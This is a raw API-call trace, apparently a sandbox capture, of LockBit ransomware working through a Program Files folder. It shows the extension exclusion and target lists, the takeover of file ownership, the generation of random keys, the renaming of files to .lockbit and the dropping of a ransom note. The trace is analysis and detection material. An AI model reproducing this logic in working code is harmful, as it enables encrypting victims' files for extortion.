wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0077.124] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.124] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x520150, dwReserved1=0x0, cFileName="4to3Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0077.124] lstrcmpiW (lpString1=".", lpString2="4to3Squareframe_SelectionSubpicture.png") returned -1 [0077.124] lstrcmpiW (lpString1="..", lpString2="4to3Squareframe_SelectionSubpicture.png") returned -1 [0077.124] PathFindExtensionW (pszPath="4to3Squareframe_SelectionSubpicture.png") returned=".png" [0077.124] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.124] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.124] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.125] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.125] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.126] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] lstrcmpiW (lpString1="ntldr", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] lstrcmpiW (lpString1="autorun.inf", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] lstrcmpiW (lpString1="thumbs.db", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] lstrcmpiW (lpString1="iconcache.db", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0077.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0077.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned=".png" [0077.126] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.126] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.126] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.126] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.127] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.127] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.127] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.127] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.127] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.lockbit") returned 92 [0077.127] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.127] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.128] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.128] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.128] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.128] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.128] RtlFreeAnsiString (AnsiString="\\") [0077.128] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0077.128] malloc (_Size=0x200) returned 0x77d800 [0077.128] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0077.129] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.129] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.129] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.131] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.131] CloseHandle (hObject=0x3ac) returned 1 [0077.131] free (_Block=0x77d800) [0077.131] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0077.131] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.131] malloc (_Size=0x40068) returned 0x3d70048 [0077.131] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3304) returned 1 [0077.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0077.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0077.132] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0077.136] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.136] malloc (_Size=0xce) returned 0x77d800 [0077.136] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0077.136] free (_Block=0x77d800) [0077.137] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0077.137] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0077.137] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.137] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec8a80b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec8a80b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd8b, dwReserved0=0x520150, dwReserved1=0x0, cFileName="4to3Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0077.137] lstrcmpiW (lpString1=".", lpString2="4to3Squareframe_VideoInset.png") returned -1 [0077.137] lstrcmpiW (lpString1="..", lpString2="4to3Squareframe_VideoInset.png") returned -1 [0077.137] PathFindExtensionW (pszPath="4to3Squareframe_VideoInset.png") returned=".png" [0077.137] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.137] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.137] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.138] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.138] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.139] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.139] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.139] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] lstrcmpiW (lpString1="ntldr", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] lstrcmpiW (lpString1="bootsect.bak", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] lstrcmpiW (lpString1="autorun.inf", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] lstrcmpiW (lpString1="thumbs.db", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] lstrcmpiW (lpString1="iconcache.db", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0077.139] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0077.139] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned=".png" [0077.139] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.139] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.139] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.140] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.140] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.140] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.140] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.141] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.141] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.141] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.141] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.141] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.lockbit") returned 83 [0077.141] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.141] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.141] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.141] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.142] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.142] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.142] RtlFreeAnsiString (AnsiString="\\") [0077.142] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b8) returned 0x0 [0077.142] malloc (_Size=0x200) returned 0x77d800 [0077.142] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0077.142] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.142] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.142] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.142] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.143] CloseHandle (hObject=0x3b8) returned 1 [0077.143] free (_Block=0x77d800) [0077.143] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0077.143] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.143] malloc (_Size=0x40068) returned 0x2031ed0 [0077.144] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=3467) returned 1 [0077.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0077.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0077.145] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.149] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.149] malloc (_Size=0xbc) returned 0x77d800 [0077.149] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0077.149] free (_Block=0x77d800) [0077.149] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0077.149] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0077.150] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.150] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="BabyBoy", cAlternateFileName="")) returned 1 [0077.150] lstrcmpiW (lpString1=".", lpString2="BabyBoy") returned -1 [0077.150] lstrcmpiW (lpString1="..", lpString2="BabyBoy") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="$windows.~bt") returned 1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="intel") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="msocache") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="$recycle.bin") returned 1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="$windows.~ws") returned 1 [0077.150] lstrcmpiW (lpString1="BabyBoy", 